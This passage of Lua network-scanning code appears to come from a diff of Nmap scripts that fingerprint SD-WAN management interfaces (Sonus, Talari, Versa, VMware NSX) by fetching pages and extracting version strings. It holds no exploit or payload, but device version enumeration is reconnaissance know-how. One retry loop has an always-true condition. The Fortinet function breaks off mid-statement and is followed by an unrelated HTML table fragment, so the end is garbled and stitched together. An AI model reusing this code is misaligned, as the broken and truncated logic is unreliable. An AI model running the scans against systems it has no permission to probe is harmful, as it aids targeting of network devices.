http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, "/style/([.0-9]+)%-[0-9]+%_rel", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Sonus Edge Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vsonus_mgmt(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and (response.status ~= 503 or response.status ~= 200) do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 503 or response.status == 200 then - - found, matches = http.response_contains(response, "EMA ([.0-9]+)", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Sonus Mgmt App Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vtalari(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, 'talari%.css%?([_.0-9A-Za-z]+)"', false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Talari Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vversa_analytics(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/versa/app/js/common/constants.js" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - - found, matches = http.response_contains(response, '0;url%=(.*)"%/%>') - - if found == true then - local urltmp = url.parse(matches[1]) - urlp = urltmp.path - response = http.generic_request(host, port, "GET", urlp) - try_counter = 1 - end - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, "%/analytics%/([v.0-9]+)%/", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Versa Analytics Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vversa_flex(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/scripts/main-layout/main-layout-controller.js" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, '"versa%-flexvnf%-([.0-9%-a-zA-Z]+)', false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "Versa Flex Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function vvmware_nsx(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. response.status) - response = http.generic_request(host,port,"GET", urlp) - end - - output_info = stdnse.output_table() - - if response == nil then - return fail("Request failed") - end - - local try_counter = 1 - - while try_counter < 6 and response.status ~= 200 do - response = http.generic_request(host, port, "GET", urlp) - try_counter = try_counter + 1 - end - - if response.status == 200 then - - found, matches = http.response_contains(response, "%/vco%-ui.([0-9.]+).", false) - if found == true then vsdwan = matches[1] else return nil end - - output_info.vsdwan_version = {} - table.insert(output_info.vsdwan_version, "VMware NSX Version: " .. vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - - -local function fortinet(host, port) - local resp_js_path, js_path, resp_js - local conf_build, conf_model, conf_label - local output_info = {} - local version - - -- trigger 401 error to find path to js file with version - resp_js_path = http.get(host, port, "/api") - if not resp_js_path.body then - return nil - end - - -- search for js file that contains version - js_path = string.match(resp_js_path.body:lower(), "

IP	mirror	status	size	device	server	www-authenticate header
'.. port.service ..'://' .. host.ip ..':' .. port.number ..'
http://' .. host.ip ..':' .. port.number ..'	[mirror]	['.. siexiste(query.status) ..']	'.. string.len(siexiste(query.body)) ..' B	'.. siexiste(categoria(serverstring)) ..'	'.. siexiste(query.header['server']) ..'	'.. siexiste(query.header['www-authenticate']) ..'